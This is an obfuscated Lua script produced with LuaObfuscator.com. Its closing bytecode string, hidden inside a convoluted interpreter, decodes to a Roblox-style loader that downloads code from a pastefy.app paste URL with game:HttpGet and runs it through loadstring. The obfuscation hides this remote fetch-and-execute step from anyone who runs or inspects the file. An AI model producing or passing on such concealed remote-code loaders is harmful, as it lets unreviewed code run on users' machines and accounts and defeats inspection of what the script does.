--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==1) then return v91;end if (v90==0) then v91=v5(v83,v19);v19=nil;v90=1;end end else return v83;end end end);local function v20(v31,v32,v33) if v33 then local v84=0 -(0 + 0) ;local v85;while true do if (v84==(0 -0)) then v85=(v31/(2^(v32-1)))%((3 -1)^(((v33-(2 -1)) -(v32-((1497 -(282 + 595)) -(555 + 64)))) + 1)) ;return v85-(v85%1) ;end end else local v86=((2570 -(1523 + 114)) -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v86 + v86))>=v86) and (928 -(214 + 713))) or (0 + 0 + (0 -0)) ;end end local function v21() local v34=0;local v35;while true do if (v34==(1066 -(67 + 1 + 997))) then return v35;end if (v34==((282 + 988) -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=(1075 -(892 + 65)) -(32 + 85) ;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v37 * (469 -213)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + 113)) ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -(379026 -283661))) + (v39 * (189 + 67)) + v38 ;end local function v24() local v42=952 -(802 + 150) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==((3 + 4) -4)) then if (v47==((0 + 0) -0)) then if (v46==(0 + 0)) then return v48 * 0 ;else v47=998 -(915 + (854 -(201 + 571))) ;v45=0 -0 ;end elseif (v47==(1193 + 854)) then return ((v46==0) and (v48 * (((1139 -(116 + 1022)) -0)/(1187 -(1069 + 118))))) or (v48 * NaN) ;end return v8(v48,v47-(2320 -1297) ) * (v45 + (v46/((3 -1)^(10 + (174 -132))))) ;end if (v42==(3 -1)) then v47=v20(v44,21 + 0 ,822 -(217 + 151 + 423) );v48=((v20(v44,100 -68 )==(19 -(10 + 8))) and  -(3 -2)) or (443 -(416 + 26)) ;v42=9 -6 ;end if (v42==(1 + 0)) then v45=1 -(0 -0) ;v46=(v20(v44,1,458 -(145 + 293) ) * (2^((1640 -1178) -(44 + 386)))) + v43 ;v42=861 -(814 + 45) ;end if (v42==(1486 -((2458 -1460) + 488))) then v43=v23();v44=v23();v42=1;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v66=886 -(261 + 624) , #v50 do v51[v66]=v2(v1(v3(v50,v66,v66)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 574 -(507 + 67) ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v68=(function() return 1749 -(1013 + 736) ;end)();while true do if (v68==1) then if (v52~=2) then else v57[ #"asd"]=(function() return v21();end)();for v99= #"[",v23() do local v100=(function() return 0 + 0 ;end)();local v101=(function() return;end)();while true do if (v100==0) then v101=(function() return v21();end)();if (v20(v101, #",", #"[")==(0 -0)) then local v156=(function() return 0 -0 ;end)();local v157=(function() return;end)();local v158=(function() return;end)();local v159=(function() return;end)();while true do if (v156==(867 -(550 + 317))) then v157=(function() return v20(v101,2 -0 , #"19(");end)();v158=(function() return v20(v101, #"?id=",6);end)();v156=(function() return 1 -0 ;end)();end if (2==v156) then if (v20(v158, #"/", #"}")== #",") then v159[2]=(function() return v59[v159[2]];end)();end if (v20(v158,2,2)== #"!") then v159[ #"-19"]=(function() return v59[v159[ #"-19"]];end)();end v156=(function() return 8 -5 ;end)();end if (v156~=3) then else if (v20(v158, #"gha", #"xxx")~= #"|") then else v159[ #"?id="]=(function() return v59[v159[ #"asd1"]];end)();end v54[v99]=(function() return v159;end)();break;end if (1~=v156) then else local v163=(function() return 285 -(134 + 151) ;end)();local v164=(function() return;end)();while true do if (v163==(1665 -(970 + 695))) then v164=(function() return 0 -0 ;end)();while true do if (v164==(1991 -(582 + 1408))) then v156=(function() return 2;end)();break;end if (v164==0) then local v170=(function() return 0 -0 ;end)();while true do if (0~=v170) then else v159=(function() return {v22(),v22(),nil,nil};end)();if (v157==(0 -0)) then local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171==0) then v172=(function() return 0;end)();while true do if (v172~=0) then else v159[ #"19("]=(function() return v22();end)();v159[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v157== #",") then v159[ #"xnx"]=(function() return v23();end)();elseif (v157==(1826 -(1195 + 629))) then v159[ #"19("]=(function() return v23() -((2 -0)^16) ;end)();elseif (v157~= #"19(") then else local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177~=0) then else v178=(function() return 0;end)();while true do if (v178==(241 -(187 + 54))) then v159[ #"xxx"]=(function() return v23() -(2^16) ;end)();v159[ #"xnxx"]=(function() return v22();end)();break;end end break;end end end v170=(function() return 781 -(162 + 618) ;end)();end if (v170==1) then v164=(function() return 1 + 0 ;end)();break;end end end end break;end end end end end break;end end end for v102= #"|",v23() do v55,v102,v28=(function() return v53(v55,v102,v28);end)();end return v57;end break;end if (v68==0) then if (1~=v52) then else local v97=(function() return 0;end)();while true do if ((1 + 0)==v97) then v59=(function() return {};end)();for v139= #"!",v58 do local v140=(function() return 0;end)();local v141=(function() return;end)();local v142=(function() return;end)();local v143=(function() return;end)();while true do if (v140==0) then v141=(function() return 0;end)();v142=(function() return nil;end)();v140=(function() return 1 -0 ;end)();end if (v140==(1 -0)) then v143=(function() return nil;end)();while true do if ((0 + 0)==v141) then v142=(function() return v21();end)();v143=(function() return nil;end)();v141=(function() return 1637 -(1373 + 263) ;end)();end if (v141~=1) then else if (v142== #">") then v143=(function() return v21()~=(1000 -(451 + 549)) ;end)();elseif (v142==2) then v143=(function() return v24();end)();elseif (v142~= #"-19") then else v143=(function() return v25();end)();end v59[v139]=(function() return v143;end)();break;end end break;end end end v97=(function() return 1 + 1 ;end)();end if (v97~=2) then else v52=(function() return 2;end)();break;end if (v97~=0) then else v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v97=(function() return 1 -0 ;end)();end end end if (v52~=(0 -0)) then else local v98=(function() return 1384 -(746 + 638) ;end)();while true do if (v98==(1 + 1)) then v52=(function() return 1;end)();break;end if (v98==(1 -0)) then v55=(function() return {};end)();v56=(function() return {};end)();v98=(function() return 2;end)();end if (v98~=(341 -(218 + 123))) then else v53=(function() return function(v144,v145,v146) local v147=(function() return 1581 -(1535 + 46) ;end)();local v148=(function() return;end)();while true do if (v147==(0 + 0)) then v148=(function() return 0;end)();while true do if ((0 + 0)~=v148) then else v144[v145-#"}" ]=(function() return v146();end)();return v144,v145,v146;end end break;end end end;end)();v54=(function() return {};end)();v98=(function() return 561 -(306 + 254) ;end)();end end end v68=(function() return 1 + 0 ;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[1469 -(899 + 568) ];local v65=v60[2 + 1 ];return function(...) local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=2 -1 ;local v74= -(1131 -(369 + 761));local v75={};local v76={...};local v77=v12("#",...) -(291 -(60 + 230)) ;local v78={};local v79={};for v87=(1083 -511) -(426 + 146) ,v77 do if ((v87>=v71) or (1938>4935)) then v75[v87-v71 ]=v76[v87 + (2 -1) ];else v79[v87]=v76[v87 + 1 ];end end local v80=(v77-v71) + 1 + 0 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1457 -(282 + 1174) ];if (v82<=((1052 -(64 + 174)) -(569 + 242))) then if ((v82<=(2 -1)) or (4255<3423)) then if ((v82>(0 + 0 + (0 -0))) or (4557<=2087)) then local v103=1024 -(706 + (654 -(144 + 192))) ;local v104;while true do if (v103==(1251 -(721 + 530))) then v104=v81[1273 -(945 + 326) ];v79[v104]=v79[v104](v13(v79,v104 + (2 -1) ,v74));break;end end else local v105=v81[2 + 0 ];local v106,v107=v72(v79[v105](v13(v79,v105 + ((917 -(42 + 174)) -(204 + 67 + 429)) ,v81[3 + 0 ])));v74=(v107 + v105) -(1501 -(1408 + 92)) ;local v108=738 -(542 + 196) ;for v134=v105,v74 do v108=v108 + (1087 -(461 + 625)) ;v79[v134]=v106[v108];end end elseif (v82==(1290 -(823 + 170 + 295))) then do return;end else v79[v81[1 + 1 ]]=v62[v81[1174 -(418 + 753) ]];end elseif ((1454<=2491) and (v82<=(2 + 3))) then if ((v82>((5 + 5) -6)) or (4157<=2803)) then v79[v81[1 + (1505 -(363 + 1141)) ]]=v81[1 + 2 ];else local v113;local v114,v115;local v116;local v117;v79[v81[1 + 1 ]]=v62[v81[532 -(406 + (1703 -(1183 + 397))) ]];v73=v73 + (1770 -(1749 + 20)) ;v81=v69[v73];v79[v81[1 + 1 ]]=v62[v81[1325 -(1249 + 73) ]];v73=v73 + 1 ;v81=v69[v73];v117=v81[1 + 1 ];v116=v79[v81[1148 -(466 + 679) ]];v79[v117 + (1122 -(118 + 1003)) ]=v116;v79[v117]=v116[v81[9 -5 ]];v73=v73 + (2 -1) ;v81=v69[v73];v79[v81[1902 -(106 + 1794) ]]=v81[1 + 2 ];v73=v73 + 1 + 0 ;v81=v69[v73];v117=v81[5 -3 ];v114,v115=v72(v79[v117](v13(v79,v117 + (2 -1) ,v81[117 -(4 + 110) ])));v74=(v115 + v117) -(585 -((173 -116) + 527)) ;v113=0 + 0 ;for v137=v117,v74 do local v138=1427 -(41 + 1386) ;while true do if ((3874==3874) and ((0 + 0)==v138)) then v113=v113 + 1 + 0 ;v79[v137]=v114[v113];break;end end end v73=v73 + (2 -1) ;v81=v69[v73];v117=v81[105 -(17 + 86) ];v79[v117]=v79[v117](v13(v79,v117 + (2 -1) ,v74));v73=v73 + 1 + 0 ;v81=v69[v73];v79[v81[3 -1 ]]();v73=v73 + (2 -1) ;v81=v69[v73];do return;end end elseif (v82>((2147 -(1913 + 62)) -(77 + 45 + 44))) then v79[v81[5 -3 ]]();else local v131=0;local v132;local v133;while true do if (v131==(753 -(239 + 514))) then v132=v81[(1934 -(565 + 1368)) + 1 ];v133=v79[v81[1332 -(797 + 532) ]];v131=1 -0 ;end if (v131==(3 -2)) then v79[v132 + 1 + 0 ]=v133;v79[v132]=v133[v81[1206 -(373 + 829) ]];break;end end end v73=v73 + 1 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F793937364C44536A2F72617700083Q0012043Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
